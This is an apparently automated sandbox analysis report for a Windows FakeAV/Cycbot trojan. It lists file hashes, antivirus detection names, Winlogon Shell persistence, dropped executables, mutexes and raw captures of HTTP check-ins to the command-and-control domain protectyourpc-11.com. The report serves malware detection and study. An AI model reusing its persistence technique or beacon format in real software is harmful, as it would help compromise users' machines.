Analysis Date: 2014-06-15 05:51:34
MD5: dee0cd39d8347401c483ae2104f2131b
SHA1: 4f1ed8c37b973e82a39c47bfc49cf0446b162d64

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 061042998429bf28becae3b5db57fd0b sha1: e3ba22761aef1c2b7ec1b7e5241fb39536cde68a size: 65024
Section .rdata md5: 27f9fd4e6e8dc33a6266477999b64866 sha1: 5393280d3804d498b9234be11dbcb1d8fcadc52d size: 4096
Section .data  md5: 4a5377e45257c1395782f99ded0c91e0 sha1: da57d8ddd87cae7b2da843443f016375049f5727 size: 48128
Section .rsrc  md5: e165e8e03e1d8b3e25b86e076bfef020 sha1: ef872a643e04e37cdec1f3beb217168bd29c7f75 size: 1024
Timestamp: 2005-11-24 22:59:31
Version: PrivateBuild: 1148
FileDescription: MS Shell
PEhash: 25f293eb6284ae3e8432f1252fe1d9a94f64d84f
IMPhash: b20735b3dd2fe93d982c537a2278038b
AV 360 Safe: Gen:Variant.Kazy.2365
AV Ad-Aware: Gen:Variant.Kazy.2365
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Downloader.Fraudload.Hdx
AV Authentium: W32/Goolbot.B.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV CA (E-Trust Ino): Win32/FakeAV.S!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Agent-599622
AV Dr. Web: Trojan.Siggen2.7743
AV Emsisoft: Gen:Variant.Kazy.2365
AV Eset (nod32): Win32/Kryptik.IAV
AV Fortinet: W32/FakeAV.BZD!tr
AV Frisk (f-prot): W32/Goolbot.B.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Variant.Kazy.2365
AV Grisoft (avg): Cryptic.BFI
AV Ikarus: Trojan.Win32.FakeAV
AV Kaspersky: Trojan-Downloader.Win32.FraudLoad.hdx
AV MalwareBytes: Backdoor.Gbot
AV Mcafee: BackDoor-EXI
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Variant.Kazy.2365
AV Norman: swizzor/Heur.I
AV Rising: Trojan.Win32.Generic.125DE368
AV Sophos: Troj/FakeAv-BWP
AV Symantec: Trojan.FakeAV!gen39
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): TrojanDownloader.FraudLoad

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process: C:\malware.exe start C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: www.google.com
Winsock DNS: 127.0.0.1
Winsock DNS: checkserverstatux.com
Winsock DNS: whysohardx.com

Process
↳ C:\malware.exe start C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\malware.exe start C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNS: www.google.com Type: A ➝ 64.233.171.106
DNS: www.google.com Type: A ➝ 64.233.171.105
DNS: www.google.com Type: A ➝ 64.233.171.104
DNS: www.google.com Type: A ➝ 64.233.171.103
DNS: www.google.com Type: A ➝ 64.233.171.99
DNS: www.google.com Type: A ➝ 64.233.171.147
DNS: protectyourpc-11.com Type: A ➝ 69.43.161.170
DNS: whysohardx.com Type: A
DNS: checkserverstatux.com Type: A
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_7&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 64.233.171.106:80
Flows TCP: 192.168.1.1:1032 ➝ 64.233.171.106:80
Flows TCP: 192.168.1.1:1033 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1035 ➝ 69.43.161.170:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   37266e3d 30266578 7472613d 30204854   7&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

Strings
.
.<..
.
}
2

040904b0
1148
FileDescription
&Main
MS Sans Serif
MS Shell
PrivateBuild
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
000RT~U-
&18	Oirz
}1P1gQ-..
(2j<fi
_?2mHA{
??2@YAPAXI@Z
 -2YZ)
@3aLP^o?
??3@YAXPAX@Z
58'&HQ&
5jmC(e
5PL9PR'
5WJ=ip
/>5x<2
5Zoxt7yw
6D/;}t
6FV3Q}!ko
7j*,Jp
7);U`S~
7v(Zn*
7z-}NY
"8B4Do
8^L0""
'8(nh!
]8ZkErg2
$a2V_0
ADVAPI32.dll
^A#-e+
aKA=e T?b
[akY}p;
_amsg_exit
BuZk`HOp'
CallNtPowerInformation
CertEnumSystemStoreLocation
_cexit
CheckDlgButton
CloseHandle
CloseThemeData
CoCreateInstance
CoInitializeEx
CommandLineToArgvW
_controlfp
CoTaskMemFree
CreateFontIndirectW
CreateSolidBrush
CreateThread
CreateWindowExW
CRYPT32.dll
CryptEncodeObject
CryptEncodeObjectEx
c_v^t-
`cYV9/KN7
@.data
DefWindowProcW
DeleteCriticalSection
DeleteObject
DestroyWindow
DialogBoxParamW
DispatchMessageW
%;D&Su
, dwNh
EnableWindow
EndDialog
EnterCriticalSection
*e QRC6
ExitProcess
#e YVL
F=4xYE
f5wcmSw'
f^}biVn
f&dYRev0
FindResourceW
FindWindowExW
FindWindowW
foqq*c
FPPrg!
FreeResource
f[t1'=
~fxTt1o
GDI32.dll
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDlgCtrlID
GetDlgItem
GetLastError
GetMessageW
GetModuleHandleA
GetParent
>GetPh_
GetProcessVersion
GetStartupInfoW
GetSysColor
GetSysColorBrush
GetSystemTimeAsFileTime
GetThemeColor
GetThemeFont
GetTickCount
GetTraceEnableFlags
GetTraceEnableLevel
GetTraceLoggerHandle
GetWindowLongW
GetWindowTextLengthW
GetWindowTextW
GlobalAlloc
hhualP
h\oL]"
hPZWiE
hR)PP/pW0e
InitializeCriticalSection
_initterm
InterlockedCompareExchange
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IsDlgButtonChecked
It!L,N
J_(3yY
>JD0/O#'
jo@g>W
k7x4[1u
KERNEL32.dll
KillTimer
KW9]4"
$KxbD)
l.4$SYz
LeaveCriticalSection
llyvps,j
LoadIconW
LoadResource
LoadStringW
LocalAlloc
LocalFree
LockResource
%>L?w|
L'xLvc
m)4ia)
memset
M(ho3@
MPwhxyw
msvcrt.dll
]@,nDdeF
n*Hy<\
nUJ<VR
+*O#De
ole32.dll
OpenThemeData
]@oRKdZ
)Owx9L
__p__commode
P`D^y[Y
__p__fmode
PmXP-lb
PostMessageW
PostQuitMessage
POWRPROF.dll
P[(P]yA
p_vny.
,|)QI!
Q)r/qw
!=,q@U
QueryPerformanceCounter
`.rdata
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegisterClassExW
RegisterDeviceNotificationW
RegisterTraceGuidsW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
*?Rq5e
?	[Rr5
"rwo'Vw
"[rx3x
RZ0MNnLV
SendDlgItemMessageW
SendMessageW
SetActiveWindow
__set_app_type
SetBkColor
SetDlgItemTextW
SetFocus
SetForegroundWindow
SetTextColor
SetTimer
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiDestroyDeviceInfoList
SetupDiEnumDeviceInterfaces
SetupDiGetClassDevsExW
__setusermatherr
SetWindowLongW
SetWindowTextW
SHELL32.dll
ShellExecuteExW
ShowWindow
-s]Pgw
,,sY^4\
TerminateProcess
?terminate@@YAXXZ
!This program cannot be run in DOS mode.
ThlFreh}
ThLibrh
ThLocah
TPh`a@
TraceMessage
TranslateMessage
T<ThM?@
tw~\+c
tztl**,Q|?
UnhandledExceptionFilter
UnregisterClassW
UnregisterDeviceNotification
UnregisterTraceGuids
USER32.dll
UxTheme.dll
'VhS\	
V.I^iG
_vsnwprintf
~~~Vw-
VW17?L
>w/?_3
WaitForSingleObject
_wcmdln
_wcsicmp
wcstoul
__wgetmainargs
WideCharToMultiByte
WTSAPI32.dll
WTSRegisterSessionNotification
WTSUnRegisterSessionNotification
wzk0<I
 X97yV8lC&/_A
_XcptFilter
x;%	K+Y>Kk
xx~dpj_)
^XZWK-
Y<L0=?
Y(}.%,w
?z6|MM
zC	KS!
..ZLhP